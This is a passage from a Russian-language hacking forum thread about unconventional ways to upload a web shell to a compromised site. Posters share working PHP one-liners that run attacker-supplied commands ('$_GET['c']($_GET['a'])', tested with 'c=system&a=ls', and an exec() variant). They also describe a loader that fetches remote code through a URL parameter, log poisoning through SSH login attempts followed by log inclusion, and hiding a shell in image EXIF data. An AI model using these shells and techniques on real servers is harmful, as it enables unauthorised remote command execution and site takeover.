Авторские статьи Не стандартные способы заливки шелла

Обсуждение в разделе «Статьи», начал(-а) Osstudio, 11.12.2011.

  1. BLurpi^_^

    BLurpi^_^ Banned

    Регистрация:
    9.02.2011
    Сообщения:
    218
    Одобрения:
    26
    Репутация:
    9
    все таки не нашел:(
     
  2. Osstudio

    Osstudio Banned

    Регистрация:
    17.04.2011
    Сообщения:
    638
    Одобрения:
    160
    Репутация:
    81
    Попробуй так :)
     
  3. BLurpi^_^

    BLurpi^_^ Banned

    Регистрация:
    9.02.2011
    Сообщения:
    218
    Одобрения:
    26
    Репутация:
    9
    Всмысле мб имеет смысл добавить разжеванный вариант в 1й пост?
    Некоторые новички может быть в хроме\опере\ие работают и не знают о тампер дате в ФФ :)
    Я об этом говорил
     
  4. Strilo4ka

    Strilo4ka

    Регистрация:
    5.04.2009
    Сообщения:
    709
    Одобрения:
    729
    Репутация:
    948
    хе-хе

    по сабжу, если allow_url_fopen=off или PHP 4 < 4.3.0 надо замену file_get_contents
     
    #64 Strilo4ka, 16.12.2011
    В последний раз редактировалось: 16.12.2011
  5. Osstudio

    Osstudio Banned

    Регистрация:
    17.04.2011
    Сообщения:
    638
    Одобрения:
    160
    Репутация:
    81
    Как вариант, если включён Curl, естественно юзать его..
    Или ещё вроде можно юзать fopen() :)
     
  6. BLurpi^_^

    BLurpi^_^ Banned

    Регистрация:
    9.02.2011
    Сообщения:
    218
    Одобрения:
    26
    Репутация:
    9
    жЕвать
    я то понял, как так заливат еще давно, а вот новички то думаю не все сразу въедут
     
  7. Osstudio

    Osstudio Banned

    Регистрация:
    17.04.2011
    Сообщения:
    638
    Одобрения:
    160
    Репутация:
    81
    Всё пошагово расписано, если не поняли - то лучше на этом пути остановиться сейчас-же..
     
  8. Osstudio

    Osstudio Banned

    Регистрация:
    17.04.2011
    Сообщения:
    638
    Одобрения:
    160
    Репутация:
    81
    А собственно где написано, что она прямо уж для новичков? :) Это для среднего юзверя, жаждущего познать информацию, у которого прямые клешни и т.п..
     
  9. BLurpi^_^

    BLurpi^_^ Banned

    Регистрация:
    9.02.2011
    Сообщения:
    218
    Одобрения:
    26
    Репутация:
    9
    хотелось бы увидеть про шелл в exif
     
  10. Osstudio

    Osstudio Banned

    Регистрация:
    17.04.2011
    Сообщения:
    638
    Одобрения:
    160
    Репутация:
    81
    Впринципе, можно сделать место функции chr(); как то так:
    $url=$_GET;$content= file_get_contents($url);...бы увидеть про шелл в exif[/QUOTE]Сделано ;)
     
    #70 Osstudio, 18.01.2012
    В последний раз редактировалось: 18.01.2012
    Это одобряют 2 пользоветелей.
  11. Machine

    Machine Elder - Старейшина

    Регистрация:
    23.06.2008
    Сообщения:
    403
    Одобрения:
    116
    Репутация:
    117
    За старания и поддержку статьи плюс.

    За орфографию минус.
     
  12. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Регистрация:
    1.10.2009
    Сообщения:
    658
    Одобрения:
    315
    Репутация:
    430
    Еще можно добавить к варианту |qbz|:
    1. Коннект по ssh,
    2. Попытки авторизоваться с именем <? $_GET['c']($_GET['a']); ?>
    3. Инклуд логов.
     
    _________________________
  13. Osstudio

    Osstudio Banned

    Регистрация:
    17.04.2011
    Сообщения:
    638
    Одобрения:
    160
    Репутация:
    81
    Собственно не понял, какое отношение к варианту qbz относится 1 и 2 :) Но добавлю.... только про 2 метод не понял, зачем нам это нужно, выполнение пхп кода в авторизации, это по-пойму немного бред (сорри) ;) или тут в чём то другом подвох?)

    З.Ы Постите методы, всё будет включено, соберём самый большой сборник, это будет неплохо, имхо!
     
    #73 Osstudio, 18.01.2012
    В последний раз редактировалось: 18.01.2012
  14. BLurpi^_^

    BLurpi^_^ Banned

    Регистрация:
    9.02.2011
    Сообщения:
    218
    Одобрения:
    26
    Репутация:
    9
    я думаю кибер-панк имел ввиду, то что их спообы похожы в том, что оба сохраняются в логах.
     
    Это одобряет 1 пользователь.
  15. Osstudio

    Osstudio Banned

    Регистрация:
    17.04.2011
    Сообщения:
    638
    Одобрения:
    160
    Репутация:
    81
    ну, логи входов сложно найти, это раз.
    А во-вторых, вот этот код:
    Code:
    <? $_GET['c']($_GET['a']); ?>
    Вызывает у меня большие подозрения, ведь он вызовет еррор? ладно бы eval() так нет, тут откуда то просто переменная из GET и следом ошибка синтаксиса, мы в итоге получим Fatal error: Function name must be a string, не более, имхо!
     
  16. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Регистрация:
    1.10.2009
    Сообщения:
    658
    Одобрения:
    315
    Репутация:
    430
    Code:
    # cat 2.php 
    <? $_GET['c']($_GET['a']); ?>
    
    2.php?c=system&a=ls

    У меня все работает.
     
    _________________________
    Это одобряют 4 пользоветелей.
  17. Ereee

    Ereee Elder - Старейшина

    Регистрация:
    1.12.2011
    Сообщения:
    560
    Одобрения:
    370
    Репутация:
    267
    С eval-ом не прокатит.
     
  18. Osstudio

    Osstudio Banned

    Регистрация:
    17.04.2011
    Сообщения:
    638
    Одобрения:
    160
    Репутация:
    81
    угу, тем более например у меня на локалке такой код не робит... пхп старый мб
     
  19. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Регистрация:
    1.10.2009
    Сообщения:
    658
    Одобрения:
    315
    Репутация:
    430
    Code:
    # php --version
    PHP 5.3.2-1ubuntu4.9 with Suhosin-Patch (cli) (built: May  3 2011 00:43:34) 
    
    Да, и лучше так:
    Code:
    <? @$_GET['c']($_GET['a']); ?>
    
     
    _________________________
  20. Osstudio

    Osstudio Banned

    Регистрация:
    17.04.2011
    Сообщения:
    638
    Одобрения:
    160
    Репутация:
    81
    system то робит, а eval как же?)
    Так можно что то из серии <?exec($_GET['a'],$a);echo$a[0];?> сделать...
     
    #80 Osstudio, 26.01.2012
    В последний раз редактировалось: 26.01.2012